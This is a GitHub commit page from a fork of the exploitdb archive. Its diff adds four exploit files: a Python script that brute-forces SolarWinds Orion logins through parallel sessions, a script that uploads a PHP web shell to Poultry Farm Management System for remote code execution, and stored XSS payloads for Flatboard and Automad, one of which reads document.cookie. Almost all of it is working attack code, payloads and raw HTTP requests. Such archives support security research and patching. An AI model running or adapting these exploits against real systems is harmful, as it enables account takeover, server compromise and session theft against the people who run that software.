forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'upstream/main'
- Loading branch information
Showing
5 changed files
with
243 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
# Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition | ||
# CVE: CVE-2024-28999 | ||
# Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions | ||
# Author: Elhussain Fathy, AKA 0xSphinx | ||
|
||
import requests | ||
import urllib3 | ||
import asyncio | ||
import aiohttp | ||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | ||
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED') | ||
|
||
# host = '192.168.1.1' | ||
# username = "admin" | ||
# file_path = "passwords.txt" | ||
|
||
host = input("Enter the host: ") | ||
username = input("Enter the username: ") | ||
file_path = input("Enter the passwords file path: ") | ||
exploited = 0 | ||
|
||
url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F" | ||
|
||
passwords = [] | ||
with open(file_path, 'r') as file: | ||
for line in file: | ||
word = line.strip() | ||
passwords.append(word) | ||
print(f"Number of tested passwords: {len(passwords)}") | ||
|
||
|
||
headers = { | ||
'Host': host, | ||
} | ||
|
||
sessions = [] | ||
|
||
for _ in range(len(passwords)): | ||
response = requests.get(url, headers=headers, verify=False, stream=False) | ||
cookies = response.headers.get('Set-Cookie', '') | ||
session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0] | ||
sessions.append(session_id) | ||
|
||
|
||
|
||
|
||
async def send_request(session, username, password): | ||
headers = { | ||
'Host': host, | ||
'Content-Type': 'application/x-www-form-urlencoded', | ||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', | ||
'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE', | ||
} | ||
|
||
data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}' | ||
|
||
async with aiohttp.ClientSession() as session: | ||
async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response: | ||
if response.status == 302: | ||
global exploited | ||
exploited = 1 | ||
print(f"Exploited Successfully Username: {username}, Password: {password}") | ||
|
||
|
||
async def main(): | ||
tasks = [] | ||
for i in range(len(passwords)): | ||
session = sessions[i] | ||
password = passwords[i] | ||
task = asyncio.create_task(send_request(session, username, password)) | ||
tasks.append(task) | ||
await asyncio.gather(*tasks) | ||
|
||
asyncio.run(main()) | ||
|
||
if(not exploited): | ||
print("Exploitation Failed") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,62 @@ | ||
# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE) | ||
# Date: 24-06-2024 | ||
# CVE: N/A (Awaiting ID to be assigned) | ||
# Exploit Author: Jerry Thomas (w3bn00b3r) | ||
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html | ||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip | ||
# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/ | ||
# Category: Web Application | ||
# Version: 1.0 | ||
# Tested on: Windows 10 | Xampp v3.3.0 | ||
# Vulnerable endpoint: http://localhost/farm/product.php | ||
|
||
import requests | ||
from colorama import Fore, Style, init | ||
|
||
# Initialize colorama | ||
init(autoreset=True) | ||
|
||
def upload_backdoor(target): | ||
upload_url = f"{target}/farm/product.php" | ||
shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php" | ||
|
||
# Prepare the payload | ||
payload = { | ||
'category': 'CHICKEN', | ||
'product': 'rce', | ||
'price': '100', | ||
'save': '' | ||
} | ||
|
||
# PHP code to be uploaded | ||
command = "hostname" | ||
data = f"<?php system('{command}');?>" | ||
|
||
# Prepare the file data | ||
files = { | ||
'productimage': ('web-backdoor.php', data, 'application/x-php') | ||
} | ||
|
||
try: | ||
print("Sending POST request to:", upload_url) | ||
response = requests.post(upload_url, files=files, data=payload, | ||
verify=False) | ||
|
||
if response.status_code == 200: | ||
print("\nResponse status code:", response.status_code) | ||
print(f"Shell has been uploaded successfully: {shell_url}") | ||
|
||
# Make a GET request to the shell URL to execute the command | ||
shell_response = requests.get(shell_url, verify=False) | ||
print("Command output:", Fore.GREEN + | ||
shell_response.text.strip()) | ||
else: | ||
print(f"Failed to upload shell. Status code: | ||
{response.status_code}") | ||
print("Response content:", response.text) | ||
except requests.RequestException as e: | ||
print(f"An error occurred: {e}") | ||
|
||
if __name__ == "__main__": | ||
target = "http://localhost" # Change this to your target | ||
upload_backdoor(target) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
# Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated) | ||
# Date: 2024-06-23 | ||
# Exploit Author: tmrswrr | ||
# Category : Webapps | ||
# Vendor Homepage: https://flatboard.org/ | ||
# Version: 3.2 | ||
# PoC: | ||
|
||
1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum | ||
2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> | ||
3-Save it , you will be payload will be executed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,89 @@ | ||
# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS) | ||
# Date: 20-06-2024 | ||
# Exploit Author: Jerry Thomas (w3bn00b3r) | ||
# Vendor Homepage: https://automad.org | ||
# Software Link: https://github.com/marcantondahmen/automad | ||
# Category: Web Application [Flat File CMS] | ||
# Version: 2.0.0-alpha.4 | ||
# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 | ||
(bullseye) | ||
|
||
# Description | ||
|
||
A persistent (stored) cross-site scripting (XSS) vulnerability has been | ||
identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker | ||
to inject malicious JavaScript code into the template body. The injected | ||
code is stored within the flat file CMS and is executed in the browser of | ||
any user visiting the forum. This can result in session hijacking, data | ||
theft, and other malicious activities. | ||
|
||
# Proof-of-Concept | ||
|
||
*Step-1:* Login as Admin & Navigate to the endpoint | ||
http://localhost/dashboard/home | ||
|
||
*Step-2:* There will be a default Welcome page. You will find an option to | ||
edit it. | ||
|
||
*Step-3:* Navigate to Content tab or | ||
http://localhost/dashboard/page?url=%2F§ion=text & edit the block named | ||
***`Main`*** | ||
|
||
*Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)> | ||
|
||
|
||
*Request:* | ||
|
||
POST /_api/page/data HTTP/1.1 | ||
|
||
Host: localhost | ||
Content-Length: 1822 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 | ||
(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 | ||
Content-Type: multipart/form-data; | ||
boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv | ||
Accept: */* | ||
Origin: http://localhost | ||
Referer: http://localhost/dashboard/page?url=%2F§ion=text | ||
Accept-Encoding: gzip, deflate | ||
Accept-Language: en-US,en;q=0.9 | ||
Cookie: | ||
Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb | ||
Connection: close | ||
|
||
------WebKitFormBoundaryzHmXQBdtZsTYQYCv | ||
Content-Disposition: form-data; name="__csrf__" | ||
|
||
49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1 | ||
------WebKitFormBoundaryzHmXQBdtZsTYQYCv | ||
Content-Disposition: form-data; name="__json__" | ||
|
||
{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing | ||
for | ||
xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS | ||
identified by | ||
Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You | ||
have successfully installed Automad 2.<br><br><img src=x | ||
onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit | ||
Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"} | ||
------WebKitFormBoundaryzHmXQBdtZsTYQYCv-- | ||
|
||
|
||
*Response:* | ||
|
||
HTTP/1.1 200 OK | ||
|
||
Server: nginx/1.24.0 | ||
Date: Thu, 20 Jun 2024 19:17:35 GMT | ||
Content-Type: application/json; charset=utf-8 | ||
Connection: close | ||
X-Powered-By: PHP/8.3.6 | ||
Expires: Thu, 19 Nov 1981 08:52:00 GMT | ||
Cache-Control: no-store, no-cache, must-revalidate | ||
Pragma: no-cache | ||
Content-Length: 30` | ||
|
||
{"code":200,"time":1718911055} | ||
|
||
|
||
*Step-5:* XSS triggers when you go to homepage - http://localhost/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters